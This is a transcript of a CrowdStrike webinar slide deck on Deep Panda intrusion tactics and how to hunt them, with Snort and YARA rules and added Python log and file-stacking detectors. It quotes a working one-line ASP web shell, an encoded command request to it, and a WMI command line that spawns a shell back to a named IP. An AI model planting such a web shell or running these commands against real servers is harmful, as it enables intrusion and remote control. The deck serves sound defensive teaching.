
CrowdCasts Monthly: Going Beyond the Indicator

Learn more about CrowdStrike Services. Request a free consultation on Proactive Response and Incident Response offerings: response.crowdstrike.com/services/

Published in: Technology, Business


  1. Going Beyond the Indicator
  2. Agenda
     • Introductions
     • Typical Attacker TTPs
     • Case Studies
     • New Tactics Explained
     • Hunting and Detecting
     • Best Practice Preparations
     • Resources / Q & A
     © 2014 CrowdStrike, Inc. All rights reserved. @CROWDSTRIKE | #CROWDCASTS
  3. Today's Speakers: Danny Lungstrom
     • 8+ years; prior to CrowdStrike: Stroz Friedberg, AT&T, The Aerospace Corporation, CERT/CC
     • Incident Response, Forensic Analysis, and Risk Assessments
     • LinkedIn: Danny Lungstrom
  4. Today's Speakers: Justin J. Weissert
     • 7+ years; prior to CrowdStrike: KPMG LLP (Information Protection and Business Resiliency)
     • Performing Security Assessments, Auditing and Remediating Environments, and Developing Security Programs/Strategies
     • LinkedIn: Justin Weissert; Twitter: @JJWeissert
  5. Today's Speakers: Ryan Jafarkhani
     • 5+ years; prior to CrowdStrike: RSA NetWitness, Mandiant, Beckman Coulter
     • Auditing, Conducting Incident Response Investigations, Network Forensics, Computer Forensics and Malware Analysis
     • LinkedIn: Ryan Jafarkhani; Twitter: @rj_jafar
  6. Who is CrowdStrike? CrowdStrike is a global provider of security technologies and services focused on identifying advanced threats and targeted attacks. Using big-data technologies, CrowdStrike's next-generation threat protection platform enables enterprises to identify unknown malware, detect zero-day threats, pinpoint advanced adversaries, and provide attribution.
  7. What Do We Do?
     • Technology: Endpoint Threat Detection & Response; Continuous Endpoint Activity Monitoring & Real-Time Forensics
     • Services: Proactive & Incident Response Services
     • Intelligence: Cyber Threat Intelligence & Attribution
  8. About CrowdStrike Services
     • Comprehensive offerings: Incident Response Investigations, Proactive Threat Assessments, IR Program Development
     • Industry veterans: average of ten years IR industry experience; backgrounds in IR consulting, government, and defense; specialists in a broad range of technologies
     • Variety of customer verticals: Finance, Technology, Manufacturing, Retail, Healthcare, Telecommunications, Oil & Gas, Entertainment
     • Who (adversary), why (intent), what (malware), industry
  9. And there are a lot of adversaries (map slide: adversary groups our Intelligence team tracks)
     • Origins shown: China, Iran, India, Russia, crime syndicates
     • Targeted sectors shown: Commercial, Government, Non-profit; Financial, Technology, Communications; Defense & Aerospace, Industrial Engineering, NGOs; Financial Sector; Dissident groups; Electronics & Communications; G20, NGOs, Dissident Groups; Energy Companies; Government, Legal, Financial, Media, Telecom; Oil and Gas Companies
  10. TYPICAL ATTACKER TTPS
  11. Typical Attacker TTPs
     • Initial Attack Vector
     • Malware
       - Persistence Mechanism
       - Command & Control
       - Functionality
     • Lateral Movement
     • Data Extraction/Theft
  12. Shift in Attacker TTPs
     | Attacker TTP | Historical Trends | Current Trends |
     |---|---|---|
     | Initial Attack Vector | Spearphish and vulnerable external-facing applications (most common) | No significant change |
     | Malware: Persistence Mechanism | Installed as service, Run key, etc. | No persistence |
     | Malware: Command & Control | Beacon to malicious IP or domain | No standard beacon activity |
     | Malware: Functionality | Simple: provides shell or basic upload/download functionality | Robust: includes all required functionality and commands |
     | Malware: Location | Written to disk | Memory-resident |
  13. Shift in Attacker TTPs (cont.)
     | Attacker TTP | Historical Trends | Current Trends |
     |---|---|---|
     | Lateral Movement | Net use, RDP or utilities (e.g. PsExec) | WMI, service accounts |
     | Obfuscation | Timestomp standard times (Windows API) | Timestomp both standard and file times (Windows API and MFT) |
     | Data Extraction | Compress data and send to compromised host provider | No significant change |
     | Last Hop Communication | Source-country IPs (most often Chinese, Russian, Iranian) | North American IPs, anonymous VPN solutions, cloud |
  14. Catalyst for Change
     • Shifts in tactics driven by increased intel sharing: whitepapers, blog posts, conference demos, VirusTotal, US Government JIB (Joint Indicator Bulletin)
     • Pros
       - Increased awareness / detection for public companies
       - Decreased intel gap for smaller organizations
       - Increased costs for attackers to change TTPs
     • Cons
       - Indicators become less effective as attackers shift TTPs (e.g. new malware, C2 infrastructure)
       - Attacks become more advanced to avoid current methods of detection
       - Reduces visibility into what the attacker is doing and/or targeting
  15. CASE STUDIES
  16. Case Studies: Background
     • Company #1
       - Company compromised in 2012 using historical TTPs
       - Partial remediation February 2013
       - Re-compromise March 2013 with new TTPs
     • Company #2
       - Compromised March 2013
       - New TTPs from the Company #1 re-compromise were observed
  17. Timeline (February to April 2013)
     • Company #1 investigation commences (traditional tactics)
     • Intel community shares TTPs (shared widely)
     • Company #1 partial remediation (logging & monitoring; old tactics)
     • Company #2 investigation commences (new tactics)
     • Company #1 re-compromised (new tactics)
  18. NEW TACTICS EXPLAINED
  19. Deep Panda: Simple Web Shell
     • 28-byte web shell: <%execute request(chr(42))%>
     • Active Server Page file
       - Expected input is VBScript code (encoded as ASCII hex)
       - The execute() function executes any VBScript passed to it: upload / download files, execute arbitrary commands (including WMI), full access to the file system
     • Controlled by an attacker "thick client"
  20. Deep Panda: Simple Web Shell (cont.)
     As a simple example of an encoded command, the following GET request would cause the backdoor to execute the code Response.Write("<h1>Hello World</h1>"), which renders "Hello World" in the web browser:
       http://<webserver>/showimage.asp?*=%52%65%73%70%6F%6E%73%65%2E%57%72%69%74%65%28%22%3C%68%31%3E%48%65%6C%6C%6F%20%57%6F%72%6C%64%3C%2F%68%31%3E%22%29
  21. Deep Panda: Complex Web Shell
     • Ability to impersonate a user (with valid credentials)
     • Eight different commands
       - File system, SQL server, and Active Directory requests
       - Upload / download files
       - Compile and execute any C# code
  22. Web Shell Authentication
     • Rudimentary (but effective) authentication for incoming connections
       - Requires the presence of a cookie named 'zWiz'
       - or HTTP header Keep-Alive = 320
       - or language header containing es-DN (invalid language)
     • Prevents identification via search engine indexing or vulnerability scanning
  23. Web Shells: But Why?
     • Primary foothold back into the victim organization
     • Less reliant on malware installed on systems and beaconing to a C2
     • Why?
       - Low to virtually no detection by antivirus products
       - The absence of command and control beacon traffic
       - Impossible to block known malicious IP addresses to a web server, since the adversary can easily change their source IP address
       - Cookie- and HTTP-header-authentication-aware web shells avoid being enumerated by search engines and restrict access, further reducing their network footprint
  24. Second Stage Malware (diagram)
     • Flow: Adversary → Anonymous VPN or Proxy → Access Web Shell → Web Server → Upload Malware → Execution using Web Shell → Lateral Movement, Data theft → C2 Infrastructure
     • Why?
       - No command and control beacon activity
       - Change IP/domain on the fly
       - Runs in memory
       - Limits forensic artifacts
  25. Lateral Movement (diagram)
     • Flow: Adversary → Anonymous VPN or Proxy → Access Web Shell → Web Server → Leverage WMI → Host 2 → C2 Infrastructure (59.111.22.222)
     • Custom VB script "PsExec" utility: 4 KB script, run with cscript.exe, to remotely launch a process as a specified user; inputs: username, password, remote host, process path
     • Command line shown on the slide: System32\cmd.exe - c:\bad.exe /f wmi /s Host2 /u Host2\Administrator /p "P@ssW0rd" /m call /q "Win32_Process" /c Create – CommandLine:C:\bad.exe /f sh /s 59.111.22.222 /p 443"
     • Why WMI?
       - Evades most typical logging
       - Shows up as WMI Service
       - Powerful functionality, built into Windows
  26. HUNTING AND DETECTING
  27. Go Beyond the Indicator
     • New evil requires new approaches for detection
     • Look through multiple haystacks for a single needle; the evil stands out with the right methodology
     • Blog series: Mo' Shells Mo' Problems, http://www.crowdstrike.com/blog/
  28. Hunting: WMI Activity
     • Windows XP and Server 2003 had limited logging: %systemroot%\system32\wbem\logs
     • Windows 7 and Server 2008 do NOT log; help investigators help you and enable it ahead of time:
         wevtutil.exe sl Microsoft-Windows-WMI-Activity/Trace /e:true
       then review WMITracing.log via Event Viewer
     • Be familiar with your environment's use of WMI
  29. Hunting Web Shells: Identifying Intrusion Points
     • Web shells are often one of the earliest stages of malware
     • Search for activity on the system near the first known compromise time
       - Successful web scans in logs
       - SQL injection
       - Dropper malware
       - Lateral movement from other compromised systems
       - Pages created or modified within the webserver document root
     • Example log entry: 2013-08-25 13:03:53 GET item-details.aspx id=1%27%20or%201=@@version-- - 80 - <redacted IP>
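An added example, not part of the deck, to illustrate slides 20 and 29 together: a Python pass over IIS-style web log lines that decodes each query parameter and flags the `*` parameter of the 28-byte shell carrying percent-encoded VBScript, as well as the SQL injection probe shown in the log entry above. The log lines and the field layout are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed IIS W3C-style log lines for this example (not from the deck).
# Assumed field order: date time cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip
HELLO_WORLD_HEX = ("%52%65%73%70%6F%6E%73%65%2E%57%72%69%74%65%28%22%3C%68%31%3E"
                   "%48%65%6C%6C%6F%20%57%6F%72%6C%64%3C%2F%68%31%3E%22%29")
SAMPLE_LOG = [
    "2013-08-25 13:03:53 GET /item-details.aspx id=1%27%20or%201=@@version-- 80 - 203.0.113.5",
    "2013-08-25 13:04:10 GET /showimage.asp *=" + HELLO_WORLD_HEX + " 80 - 203.0.113.5",
    "2013-08-25 13:05:00 GET /default.aspx - 80 - 198.51.100.9",
]
STAR_PARAM = "parameter named '*' (what execute request(chr(42)) reads)"
ENCODED_VALUE = "value is almost entirely %XX-encoded"
SCRIPT_CODE = "VBScript/ASP code in parameter value"
SQLI_PATTERN = "SQL injection pattern"
SQLI_RE = re.compile(r"(?i)(@@version|'\s*or\s+\d+\s*=|union\s+select|--\s*$)")
# Script constructs that a legitimate page parameter has no reason to carry.
CODE_RE = re.compile(r"(?i)\b(Response\.Write|Execute|Eval|CreateObject|GetObject|WScript\.Shell)\b")

def decode_query(query):
    """Split 'a=1&b=2' into (name, raw_value, decoded_value) triples."""
    triples = []
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        triples.append((unquote(name), raw, unquote(raw)))
    return triples

def encoded_ratio(raw):
    """Fraction of a raw query value that consists of %XX escapes."""
    return 3 * len(re.findall(r"%[0-9A-Fa-f]{2}", raw)) / len(raw) if raw else 0.0

def analyze_line(line):
    """Return a finding record for one log line, or None if nothing stands out."""
    parts = line.split()
    if len(parts) < 8 or parts[4] == "-":        # no query string to inspect
        return None
    params = decode_query(parts[4])
    findings = []
    for name, raw, decoded in params:
        if name == "*":
            findings.append(STAR_PARAM)
        if len(raw) >= 12 and encoded_ratio(raw) >= 0.8:
            findings.append(ENCODED_VALUE)
        if CODE_RE.search(decoded):
            findings.append(SCRIPT_CODE)
        if SQLI_RE.search(decoded):
            findings.append(SQLI_PATTERN)
    if not findings:
        return None
    return {"time": f"{parts[0]} {parts[1]}", "client_ip": parts[7], "page": parts[3],
            "decoded_query": [d for _, _, d in params], "findings": findings}

def analyze_log(lines):
    return [hit for hit in map(analyze_line, lines) if hit]
```

Running `analyze_log(SAMPLE_LOG)` returns two hits: the SQL injection probe against item-details.aspx, and the showimage.asp request whose `*` parameter decodes to `Response.Write("<h1>Hello World</h1>")`.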
  30. Hunting Web Shells: File Stacking
     • File stacking is based on the concept of least frequency of occurrence
     • Collect files from all of your web servers and investigate outliers
       - What files do not exist on other web servers?
       - PHP | JSP | ASP | ASPX | CFM
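An added example (not from the deck) of the file-stacking idea on this slide: Python that takes per-server inventories of the web root, keeps only the PHP/JSP/ASP/ASPX/CFM files, and reports the least-frequently-occurring ones. It goes one step beyond the slide by also catching a page that exists on every server but whose content differs on one of them. The inventories are constructed; how files are collected from each server is left to the reader.

```python
import hashlib
from collections import Counter, defaultdict

WEB_EXTS = (".php", ".jsp", ".asp", ".aspx", ".cfm")
REASON_UNIQUE = "not present on other servers"
REASON_MODIFIED = "content differs from the copy on the other servers"

# Constructed per-server inventories (server -> {path: file bytes}) for this example.
# In practice each would come from a directory listing plus file hash on that server.
INVENTORIES = {
    "web01": {"/default.aspx": b"<%@ Page %> home", "/item-details.aspx": b"<%@ Page %> item",
              "/images/logo.png": b"\x89PNG", "/showimage.asp": b"<%execute request(chr(42))%>"},
    "web02": {"/default.aspx": b"<%@ Page %> home", "/item-details.aspx": b"<%@ Page %> item",
              "/images/logo.png": b"\x89PNG"},
    "web03": {"/default.aspx": b"<%@ Page %> home", "/item-details.aspx": b"<%@ Page %> item <% extra %>",
              "/images/logo.png": b"\x89PNG"},
}

def fingerprint(content):
    """SHA-256 of the file content, so a tampered copy of a common page stands out."""
    return hashlib.sha256(content).hexdigest()

def stack_files(inventories, max_servers=1):
    """Least-frequency-of-occurrence across servers. Returns script files that
    either exist on at most max_servers servers, or exist on more servers but
    whose content differs from the majority copy on at most max_servers of them.
    With an even split there is no clear majority; raise max_servers and review both."""
    by_path = defaultdict(dict)                      # path -> {server: hash}
    for server, files in inventories.items():
        for path, content in files.items():
            if path.lower().endswith(WEB_EXTS):      # only the script types from the slide
                by_path[path][server] = fingerprint(content)
    outliers = []
    for path, hashes in sorted(by_path.items()):
        if len(hashes) <= max_servers:
            outliers.append({"path": path, "servers": sorted(hashes), "reason": REASON_UNIQUE})
            continue
        majority_hash, _ = Counter(hashes.values()).most_common(1)[0]
        odd = sorted(s for s, h in hashes.items() if h != majority_hash)
        if 0 < len(odd) <= max_servers:
            outliers.append({"path": path, "servers": odd, "reason": REASON_MODIFIED})
    return outliers

if __name__ == "__main__":
    for o in stack_files(INVENTORIES):
        print(o["path"], o["servers"], o["reason"])
```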
  31. Hunting Web Shells: Web Log Review
     • Perform statistical analysis of page requests and search for outliers; see exactly when the web shells were in use via the web logs
  32. Hunting Web Shells: Network Monitoring
     • Stack web requests from network data
     • Leverage cyber intelligence feeds to detect known web shells: unique header attributes, HTML used to produce the shell
     • Example Snort rule:
         alert tcp $EXTERNAL_NET any -> $WEB_SERVERS $HTTP_PORTS (msg:"CrowdStrike Deep Panda CSharp Webshell Headers"; content:"Keep-Alive: 320"; http_raw_header; content:"es-DN"; http_raw_header; flow:established,to_server; classtype:trojan-activity; metadata:service http; sid:xxx; rev:xxx;)
  33. Hunting: Memory Resident Malware
     • "Fileless" forensics fun
     • Persistence, we don't need no stinkin' persistence
     • New approach to malware means new approach to forensics
     • Hidden, not invisible
     • What's normal and what's new? Get to know your systems; image memory, review, rinse and repeat
  34. Hunting with YARA
     • YARA signatures can be used to search your enterprise for specific patterns on disk and in memory
     • Example rule:
         rule CrowdStrike_13091_01 : deep_panda alice RAT
         {
             meta:
                 description = "Detection of Mad Hatter .NET RAT"
                 last_modified = "2013-10-08"
                 version = "1.1"
                 in_the_wild = true
                 copyright = "CrowdStrike, Inc"
                 report = "CSIT-13091"
             strings:
                 $marker1 = "alice'srabbithole" wide
                 $marker2 = "{{\"Version\":{0},\"HostName\":\"{1}\",\"osVersion\": \"{2}\",\"tm\": \"{3}\",\"tz\":{4}}}" wide
                 $marker3 = "InstManager.pdb"
                 $marker4 = "<osVersion>"
                 $marker5 = "<tm>"
                 $marker6 = "<tz>"
             condition:
                 // MZ header, PE signature at e_lfanew, and at least two of the markers
                 uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and 2 of ($marker*)
         }
  35. CrowdResponse
     • Free CrowdStrike community tool
     • Collect and analyze artifacts across your enterprise
     • Available modules: DirList, YARA, PSList; many modules coming soon
     • http://www.crowdstrike.com/community-tools/
  36. BEST PRACTICE PREPARATIONS
  37. Best Practices: Proactive Defense of Your Network
     • Isolate critical assets with network segmentation
     • Consolidate and monitor Internet egress points
     • Implement centralized logging
     • Patch, patch, and patch again
     • Secure web applications and internal software projects
     • Minimize or remove local admin privileges
     • Implement a tiered Active Directory admin model
     • Incorporate cyber intelligence feeds
  38. CrowdStrike Can Help! Services to consider
     • Tabletop assessments (yearly at least): keep your team primed and educated on the latest attack vectors
     • Next-gen penetration testing: more than just a cursory glance; take a real-world scenario approach
     • Incident response, disaster recovery and business continuity plans: CrowdStrike knowledge and experience can help you improve/build plans
     • Incident response services retainer: avoid paperwork-related time delays
     • CrowdStrike Intelligence subscription: stay up to date with the latest attacker TTPs
  39. CROWDSTRIKE RESOURCES
  40. CrowdStrike Global Threat Report
     • Adversary activity analysis and predictions
     • Look back at 2013
     • Predictive trends for 2014
     • Threat actor profiles and TTPs
     • Get it on crowdstrike.com
  41. CrowdStrike Services: Proactive Response Services and Incident Response Services, alongside Intelligence and Technology
  42. CrowdStrike Services (cont.)
     • Proactive Response Services: Counter Threat Assessment, IR Program Development, Next-Gen Pen Testing, Tabletop Assessment, InfoSec Capability Maturity Model, Adversary Assessments
     • Incident Response Services: Computer Forensic Analysis, Litigation Support, Expert Witness Testimony, Remediation, Malware Analysis
  43. Falcon Intelligence: Threat Intelligence Subscription
     1. Government-quality intelligence developed using an 'all-source model'
     2. Detailed technical and strategic analysis of 50+ adversaries' capabilities, indicators and tradecraft, attribution and intentions
     3. Customizable feeds and API for indicators of compromise
     4. Indicators can be integrated into current firewall, IDS/IPS, or SIEM solutions to provide real-time attribution
     5. Tailored Intelligence feature provides visibility into breaking events that matter to an organization's brand, infrastructure, and customers
  44. Falcon Host: Endpoint Threat Detection & Response
     1. Identifies unknown malware & detects zero-day threats
     2. Captures and correlates system events to identify adversary activity in real time
     3. Maximum visibility across the full kill chain allows for insight into past & current attacks
     4. Context-based detection does not rely on signatures or easily changed IOCs
     5. Intelligence integration provides full attribution to identify the context, motivation, and actor behind an attack
  45. Falcon Host: Continuous Endpoint Activity Monitoring
     1. Explore rich execution data collected by the Falcon Host sensors
     2. Dashboards provide an at-a-glance view of recent activity for investigative purposes
     3. An expert-designed menu of queries provides the ability to proactively hunt for malicious activity
  46. Q & A
  47. NEXT: Operationalizing Intelligence, with Adam Meyers (Director, Intelligence) and Elia Zaitsev (Senior Sales Engineer). April 29th | 2PM ET / 11AM PT. Q&A
